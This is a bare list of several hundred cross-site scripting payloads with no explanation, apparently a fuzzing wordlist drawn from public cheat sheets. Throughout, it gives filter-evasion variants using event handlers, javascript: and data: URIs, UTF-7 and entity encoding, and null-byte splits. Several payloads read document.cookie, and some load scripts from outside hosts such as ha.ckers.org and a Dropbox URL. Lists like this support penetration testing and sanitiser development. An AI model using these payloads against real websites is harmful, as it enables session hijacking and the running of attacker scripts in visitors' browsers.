';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";al
ert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></
SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascrscriptipt:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC="  javascript:alert('XSS');">
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
\";alert('XSS');//
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
¼script¾alert(¢XSS¢)¼/script¾
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<TABLE BACKGROUND="javascript:alert('XSS')">
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\
0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\
0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<DIV STYLE="width: expression(alert('XSS'));">
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
<XSS STYLE="xss:expression(alert('XSS'))">
exp/*<A
STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e);
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import
namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML"
to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>"></BODY></HTML>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT
SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<form id="test" /><button form="test"
formaction="javascript:alert(123)">TESTHTML5FORMACTION
<form><button formaction="javascript:alert(123)">crosssitespt
<frameset onload=alert(123)>
<img src=x onerror=alert(123)//">
<style><img src="</style><img src=x onerror=alert(123)//">
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
<embed src="javascript:alert(1)">
<? foo="><script>alert(1)</script>">
<! foo="><script>alert(1)</script>">
</ foo="><script>alert(1)</script>">
<script>({0:#0=alert/#0#/#0#(123)})</script>
<script>ReferenceError.prototype.__defineGetter__('name', function()
{alert(123)}),x</script>
<script>Object.__noSuchMethod__ =
Function,[{}][0].constructor._('alert(1)')()</script>
<script src="#">{alert(1)}</script>;1
<script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-
use')</script>
<svg xmlns="#"><script>alert(1)</script></svg>
<svg onload="javascript:alert(123)" xmlns="#"></svg>
<iframe xmlns="#" src="javascript:alert(1)"></iframe>
+ADw-script+AD4-alert(document.location)+ADw-/script+AD4-
%2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-
+ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-
%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-
%253cscript%253ealert(document.cookie)%253c/script%253e
“><s”%2b”cript>alert(document.cookie)</script>
“><ScRiPt>alert(document.cookie)</script>
“><<script>alert(document.cookie);//<</script>
foo<script>alert(document.cookie)</script>
<scr<script>ipt>alert(document.cookie)</scr</script>ipt>
%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://
my.box.com/xss.js%3E%3C/script%3E%22)’%3E
‘; alert(document.cookie); var foo=’
foo\’; alert(document.cookie);//’;
</script><script >alert(document.cookie)</script>
<img src=asdf onerror=alert(document.cookie)>
<BODY ONLOAD=alert(’XSS’)>
<script>alert(1)</script>
"><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))</script>
<video src=1 onerror=alert(1)>
<audio src=1 onerror=alert(1)>
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";ale
rt(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></
SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<a onmouseover="alert(document.cookie)">xxs link</a>
<a onmouseover=alert(document.cookie)>xxs link</a>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=# onmouseover="alert('xxs')">
<IMG SRC= onmouseover="alert('xxs')">
<IMG onmouseover="alert('xxs')">
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
<IMG
SRC=javascript:ale&#
114;t(
'XSS')>
<IMG
SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112
&#0000116&#0000058&#0000097&
#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#000
0039&#0000041>
<IMG
SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&
#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav	ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<IMG SRC="javascript:alert('XSS');">
<IMG SRC="  javascript:alert('XSS');">
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
<SCRIPT SRC=//ha.ckers.org/.j>
<IMG SRC="javascript:alert('XSS')"
<iframe src=http://ha.ckers.org/scriptlet.html <
\";alert('XSS');//
</script><script>alert('XSS');</script>
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS')">
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
<IMG SRC='vbscript:msgbox("XSS")'>
<IMG SRC="livescript:[code]">
<BODY ONLOAD=alert('XSS')>
<BGSOUND SRC="javascript:alert('XSS');">
<BR SIZE="&{alert('XSS')}">
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
exp/*<A STYLE='no\xss:noxss("*//*");
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A
CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<XSS STYLE="xss:expression(alert('XSS'))">
<XSS STYLE="behavior: url(xss.htc);">
¼script¾alert(¢XSS¢)¼/script¾
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html
base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<TABLE BACKGROUND="javascript:alert('XSS')">
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\
0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\
0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">

<BASE HREF="javascript:alert('XSS');//">
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>

<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?
somevariables=maliciouscode">
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7">
</HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT
SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<A HREF="http://66.102.7.147/">XSS</A>
0\"autofocus/onfocus=alert(1)--><video/poster/ error=prompt(2)>"-confirm(3)-"
veris-->group<svg/onload=alert(/XSS/)//
#"><img src=M onerror=alert('XSS');>
element[attribute='<img src=x onerror=alert('XSS');>
[<blockquote cite="]">[" onmouseover="alert('RVRSH3LL_XSS');" ]
%22;alert%28%27RVRSH3LL_XSS%29//
javascript:alert%281%29;
<w contenteditable id=x onfocus=alert()>
alert;pg("XSS")
<svg/onload=%26%23097lert%26lpar;1337)>
<script>for((i)in(self))eval(i)(1)</script>
<scr<script>ipt>alert(1)</scr</script>ipt><scr<script>ipt>alert(1)</scr</script>ipt>
<sCR<script>iPt>alert(1)</SCr</script>IPt>
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">test</a>
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onoffline="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onpagehide="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onpageshow="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onpopstate="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onresize="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onstorage="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onunload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onblur="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onchange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x oncontextmenu="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x oninput="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x oninvalid="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onreset="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onsearch="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onselect="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onsubmit="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onkeydown="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onkeypress="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onkeyup="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onclick="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ondblclick="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmousedown="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmousemove="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmouseout="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmouseover="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmouseup="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmousewheel="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onwheel="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ondrag="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ondragend="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ondragenter="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ondragleave="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ondragover="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ondragstart="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ondrop="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onscroll="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x oncopy="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x oncut="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onpaste="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onabort="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x oncanplay="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x oncanplaythrough="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x oncuechange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ondurationchange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onemptied="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onended="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onloadeddata="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onloadedmetadata="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onloadstart="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onpause="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onplay="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onplaying="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onprogress="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onratechange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onseeked="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onseeking="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onstalled="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onsuspend="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ontimeupdate="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onvolumechange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onwaiting="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onshow="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ontoggle="alert(String.fromCharCode(88,83,83))">
<META onpaonpageonpagonpageonpageshowshoweshowshowgeshow="alert(1)";
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<INPUT TYPE="BUTTON" action="alert('XSS')"/>
"><h1><IFRAME SRC="javascript:alert('XSS');"></IFRAME>">123</h1>
"><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1>
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
"><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1>
"></iframe><script>alert(`TEXT YOU WANT TO BE DISPLAYED`);</script><iframe
frameborder="0%EF%BB%BF
"><h1><IFRAME width="420" height="315" SRC="http://www.youtube.com/embed/sxvccpasgTE"
frameborder="0" onmouseover="alert(document.cookie)"></IFRAME>123</h1>
"><h1><iframe width="420" height="315" src="http://www.youtube.com/embed/sxvccpasgTE"
frameborder="0" allowfullscreen></iframe>123</h1>
><h1><IFRAME width="420" height="315" frameborder="0"
onmouseover="document.location.href='https://www.youtube.com/channel/
UC9Qa_gXarSmObPX3ooIQZr
g'"></IFRAME>Hover the cursor to the LEFT of this Message</h1>&ParamHeight=250
<IFRAME width="420" height="315" frameborder="0"
onload="alert(document.cookie)"></IFRAME>
"><h1><IFRAME SRC="javascript:alert('XSS');"></IFRAME>">123</h1>
"><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1>
<iframe src=http://xss.rocks/scriptlet.html <
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
<iframe src="&Tab;javascript:prompt(1)&Tab;">
<svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'
<input/onmouseover="javaSCRIPT&colon;confirm(1)"
<sVg><scRipt >alert(1) {Opera}
<img/src=`` onerror=this.onerror=confirm(1)
<form><isindex formaction="javascript&colon;confirm(1)"
<img src=``&NewLine; onerror=alert(1)&NewLine;
<script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>
<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
<iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
<script /**/>/**/alert(1)/**/</script /**/
"><h1/onmouseover='\u0061lert(1)'>
<iframe/src="data:text/html,<svg onload=alert(1)>">
<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-
equiv="refresh"/>
<svg><script xlink:href=data&colon;,window.open('https://www.google.com/') </script
<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
<iframe src=javascript&colon;alert(document&period;location)>
<form><a
href="javascript:\u0061lert(1)">X</script><img/*/src="worksinchrome&colon;p
rompt(1)"/*/onerror='eval(src)'>
<img/	
 src=`~` onerror=prompt(1)>
<form><iframe 	
 src="javascript:alert(1)"
	;>
<a href="data:application/x-x509-user-
cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	
>X<
/a
http://www.google<script .com>alert(document.location)</script
<a href=[]" onmouseover=prompt(1)//">XYZ</a
<img/src=@  onerror = prompt('1')
<style/onload=prompt('XSS')
<script ^__^>alert(String.fromCharCode(49))</script ^__^
</style  ><script   :-(>/**/alert(document.location)/**/</script   :-(
</form><input type="date" onfocus="alert(1)">
<form><textarea  onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'>
<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/
</script /***/
<iframe srcdoc='<body onload=prompt(1)>'>
<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>
<script ~~~>alert(0%0)</script ~~~>
<style/onload=
<script src="data:text/javascript,alert(1)"></script>
<iframe/src \/\/onload = prompt(1)
<iframe/onreadystatechange=alert(1)
<svg/onload=alert(1)
<input value=<><iframe/src=javascript:confirm(1)
<input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
http://www.<script>alert(1)</script .com
<iframe
src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&
Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r
&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&
Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&
Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab
;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab
;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab
;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&Ne
wLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&N
ewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Ta
b;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Ta
b;&Tab;&Tab;%29></iframe>
<svg><script ?>alert(1)
<iframe
src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&
Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
<img src=`xx:xxònerror=alert(1)>
<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>
<math><a xlink:href="//jsfiddle.net/t846h/">click
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
<svg contentScriptType=text/vbs><script>MsgBox+1
<a href="data:text/html;base64_,<svg/onload=\u0061l&#101%72t(1)>">X</a
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \
u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
<script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script
a=\u0061 & /=%2F
<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C
%65%72%74(/XSS/)></script
<object data=javascript&colon;\u0061l&#101%72t(1)>
<script>+-+-1-+-+alert(1)</script>
<body/onload=
--> <img src=xxx:x onerror=javascript:alert(1)> -->
-->
-->
-->
`"'><img src='#\x27 onerror=javascript:alert(1)>
<a href="javascript\x3Ajavascript:alert(1)" id="fuzzelement1">test</a>
"'`><p><svg><script>a='hello\x27;javascript:alert(1)//';</script></p>
<a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x07cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x0Dcript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x08cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x03cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x04cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x01cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x09cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x06cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x0Ccript:javascript:alert(1)" id="fuzzelement1">test</a>
<script>/* *\x2A/javascript:alert(1)// */</script>
<script>/* *\x00/javascript:alert(1)// */</script>
<style></style\x3E<img src="about:blank" onerror=javascript:alert(1)//></style>
<style></style\x0D<img src="about:blank" onerror=javascript:alert(1)//></style>
<style></style\x09<img src="about:blank" onerror=javascript:alert(1)//></style>
<style></style\x20<img src="about:blank" onerror=javascript:alert(1)//></style>
<style></style\x0A<img src="about:blank" onerror=javascript:alert(1)//></style>
"'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1);/*';">DEF
"'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1);/*';">DEF
<script>if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}</script>
<script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}</script>
<script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)>
"'`><\x00img src=xxx:x onerror=javascript:alert(1)>
<script src="data:text/plain\x2Cjavascript:alert(1)"></script>
<script src="data:\xD4\x8F,javascript:alert(1)"></script>
<script src="data:\xE0\xA4\x98,javascript:alert(1)"></script>
<script src="data:\xCB\x8F,javascript:alert(1)"></script>
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF
ABC<div style="x:expression\x5C(javascript:alert(1)">DEF
ABC<div style="x:expression\x00(javascript:alert(1)">DEF
ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF
ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF
ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF
ABC<div style="x:\x09expression(javascript:alert(1)">DEF
ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF
ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF
ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF
ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF
ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF
ABC<div style="x:\x20expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF
ABC<div style="x:\x00expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF
ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF
<a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a>
